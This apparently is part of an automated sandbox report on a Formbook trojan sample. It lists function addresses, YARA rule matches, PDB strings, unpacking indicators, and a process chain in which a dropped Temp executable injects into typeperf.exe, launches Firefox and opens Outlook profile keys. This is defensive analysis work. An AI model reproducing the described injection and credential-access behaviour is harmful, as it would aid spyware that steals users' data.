            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2132D5_2_00B2132D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5D34C5_2_00A5D34C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2F43F5_2_00B2F43F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A614605_2_00A61460
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B0D5B05_2_00B0D5B0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B275715_2_00B27571
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B216CC5_2_00B216CC
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2F7B05_2_00B2F7B0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A738E05_2_00A738E0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADD8005_2_00ADD800
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B059105_2_00B05910
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A799505_2_00A79950
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8B9505_2_00A8B950
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AB5AA05_2_00AB5AA0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B0DAAC5_2_00B0DAAC
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B1DAC65_2_00B1DAC6
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE3A6C5_2_00AE3A6C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B27A465_2_00B27A46
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2FA495_2_00B2FA49
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8FB805_2_00A8FB80
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AADBF95_2_00AADBF9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE5BF05_2_00AE5BF0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2FB765_2_00B2FB76
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2FCF25_2_00B2FCF2
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE9C325_2_00AE9C32
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8FDC05_2_00A8FDC0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B27D735_2_00B27D73
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A73D405_2_00A73D40
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B21D5A5_2_00B21D5A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A79EB05_2_00A79EB0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2FFB15_2_00B2FFB1
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A71F925_2_00A71F92
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2FF095_2_00B2FF09
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033CA35211_2_033CA352
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0331E3F011_2_0331E3F0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033D03E611_2_033D03E6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033B027411_2_033B0274
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033902C011_2_033902C0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033AA11811_2_033AA118
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0330010011_2_03300100
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0339815811_2_03398158
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033D01AA11_2_033D01AA
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033C81CC11_2_033C81CC
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0331077011_2_03310770
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0333475011_2_03334750
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0330C7C011_2_0330C7C0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0332C6E011_2_0332C6E0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0331053511_2_03310535
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033D059111_2_033D0591
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033C244611_2_033C2446
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033BE4F611_2_033BE4F6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033CAB4011_2_033CAB40
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033C6BD711_2_033C6BD7
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0330EA8011_2_0330EA80
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0332696211_2_03326962
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033129A011_2_033129A0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033DA9A611_2_033DA9A6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0331A84011_2_0331A840
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0331284011_2_03312840
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_032F68B811_2_032F68B8
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0333E8F011_2_0333E8F0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03330F3011_2_03330F30
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03352F2811_2_03352F28
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03384F4011_2_03384F40
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0338EFA011_2_0338EFA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0331CFE011_2_0331CFE0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03302FC811_2_03302FC8
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033CEE2611_2_033CEE26
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03310E5911_2_03310E59
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03322E9011_2_03322E90
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033CCE9311_2_033CCE93
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033CEEDB11_2_033CEEDB
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0331AD0011_2_0331AD00
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03328DBF11_2_03328DBF
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0330ADE011_2_0330ADE0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03310C0011_2_03310C00
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033B0CB511_2_033B0CB5
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03300CF211_2_03300CF2
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033C132D11_2_033C132D
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_032FD34C11_2_032FD34C
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0335739A11_2_0335739A
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033152A011_2_033152A0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033B12ED11_2_033B12ED
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0332B2C011_2_0332B2C0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033DB16B11_2_033DB16B
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0334516C11_2_0334516C
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_032FF17211_2_032FF172
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0331B1B011_2_0331B1B0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033C70E911_2_033C70E9
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033CF0E011_2_033CF0E0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033170C011_2_033170C0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033BF0CC11_2_033BF0CC
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033CF7B011_2_033CF7B0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033C16CC11_2_033C16CC
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033C757111_2_033C7571
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033AD5B011_2_033AD5B0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033CF43F11_2_033CF43F
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0330146011_2_03301460
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033CFB7611_2_033CFB76
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0332FB8011_2_0332FB80
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03385BF011_2_03385BF0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0334DBF911_2_0334DBF9
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03383A6C11_2_03383A6C
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033CFA4911_2_033CFA49
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033C7A4611_2_033C7A46
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03355AA011_2_03355AA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033ADAAC11_2_033ADAAC
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033BDAC611_2_033BDAC6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0331995011_2_03319950
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0332B95011_2_0332B950
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0337D80011_2_0337D800
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033138E011_2_033138E0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033CFF0911_2_033CFF09
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033CFFB111_2_033CFFB1
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03311F9211_2_03311F92
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03319EB011_2_03319EB0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033C7D7311_2_033C7D73
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033C1D5A11_2_033C1D5A
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03313D4011_2_03313D40
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0332FDC011_2_0332FDC0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03389C3211_2_03389C32
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033CFCF211_2_033CFCF2
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0293181011_2_02931810
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0294728011_2_02947280
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0292CA7011_2_0292CA70
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_02932F5011_2_02932F50
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0292CC9011_2_0292CC90
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0292AD1011_2_0292AD10
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0292AD0E11_2_0292AD0E
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: String function: 032FB970 appears 272 times
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: String function: 03357E54 appears 98 times
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: String function: 0338F290 appears 105 times
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: String function: 03345130 appears 37 times
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: String function: 0337EA12 appears 86 times
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: String function: 00A5B970 appears 275 times
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: String function: 00ADEA12 appears 86 times
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: String function: 00AB7E54 appears 101 times
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: String function: 00415600 appears 49 times
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: String function: 00AEF290 appears 105 times
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: String function: 00AA5130 appears 57 times
            Source: BMhDm7YW62.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 5.2.okawzsv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.okawzsv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3735194669.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.3738071578.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3735067782.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3735429878.0000000002B30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1430474798.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/3@20/13
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404292
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,0_2_00402053
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeFile created: C:\Users\user\AppData\Local\Temp\nskB726.tmpJump to behavior
            Source: BMhDm7YW62.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: BMhDm7YW62.exeReversingLabs: Detection: 54%
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeFile read: C:\Users\user\Desktop\BMhDm7YW62.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\BMhDm7YW62.exe C:\Users\user\Desktop\BMhDm7YW62.exe
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeProcess created: C:\Users\user\AppData\Local\Temp\okawzsv.exe "C:\Users\user\AppData\Local\Temp\okawzsv.exe"
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeProcess created: C:\Users\user\AppData\Local\Temp\okawzsv.exe C:\Users\user\AppData\Local\Temp\okawzsv.exe
            Source: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exeProcess created: C:\Windows\SysWOW64\typeperf.exe C:\Windows\SysWOW64\typeperf.exe
            Source: C:\Windows\SysWOW64\typeperf.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeProcess created: C:\Users\user\AppData\Local\Temp\okawzsv.exe "C:\Users\user\AppData\Local\Temp\okawzsv.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeProcess created: C:\Users\user\AppData\Local\Temp\okawzsv.exe C:\Users\user\AppData\Local\Temp\okawzsv.exeJump to behavior
            Source: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exeProcess created: C:\Windows\SysWOW64\typeperf.exe C:\Windows\SysWOW64\typeperf.exeJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Binary string: firefox.pdbP source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1663641702.0000000007D85000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000000.1350794169.0000000000BCE000.00000002.00000001.01000000.00000006.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000000.1483436758.0000000000BCE000.00000002.00000001.01000000.00000006.sdmp
            Source: Binary string: typeperf.pdb source: okawzsv.exe, 00000005.00000002.1429982812.00000000005D8000.00000004.00000020.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000003.1817748290.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: okawzsv.exe, 00000002.00000003.1274910552.000000001CF60000.00000004.00001000.00020000.00000000.sdmp, okawzsv.exe, 00000002.00000003.1278096689.000000001D140000.00000004.00001000.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000003.1348854988.0000000000883000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000003.1346736464.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000002.1430135301.0000000000BCE000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1429101996.0000000002F6A000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1431661373.000000000311F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: okawzsv.exe, okawzsv.exe, 00000005.00000003.1348854988.0000000000883000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000003.1346736464.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000002.1430135301.0000000000BCE000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, typeperf.exe, 0000000B.00000003.1429101996.0000000002F6A000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1431661373.000000000311F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\xampp\htdocs\cdf5e02cc6bc498bb3e1a68a897b97eb\Loader\Release\Loader.pdb source: BMhDm7YW62.exe, 00000000.00000002.1295073357.0000000002914000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp, okawzsv.exe, 00000002.00000000.1266849062.0000000000426000.00000002.00000001.01000000.00000004.sdmp, okawzsv.exe, 00000005.00000000.1273203469.0000000000426000.00000002.00000001.01000000.00000004.sdmp, typeperf.exe, 0000000B.00000002.3736723872.0000000003633000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3733581608.0000000002DC0000.00000004.00000020.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000000.1483909115.0000000002C73000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1663743072.00000000166C3000.00000004.80000000.00040000.00000000.sdmp, okawzsv.exe.0.dr
            Source: Binary string: typeperf.pdbGCTL source: okawzsv.exe, 00000005.00000002.1429982812.00000000005D8000.00000004.00000020.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000003.1817748290.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1663641702.0000000007D85000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeUnpacked PE file: 5.2.okawzsv.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_00415645 push ecx; ret 2_2_00415658
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_0041178A push ecx; ret 2_2_0041179D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040D054 push ebx; retf 5_2_0040D05A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0041429A push ebx; iretd 5_2_0041429B
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_004034A0 push eax; ret 5_2_004034A2
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00414556 push esp; iretd 5_2_0041455E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00407DC3 push esp; retf 5_2_00407DE2
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0041ADA3 push edi; iretd 5_2_0041ADA5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0042B7C2 push eax; ret 5_2_0042B7C4
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A609AD push ecx; mov dword ptr [esp], ecx5_2_00A609B6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033009AD push ecx; mov dword ptr [esp], ecx11_2_033009B6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_029353E2 push ebx; ret 11_2_02935460
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0294831F push eax; ret 11_2_02948321
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_029310B3 push esp; iretd 11_2_029310BB
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_029321AC push 38B5450Eh; iretd 11_2_029321BF
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0294468D push edx; ret 11_2_0294469F
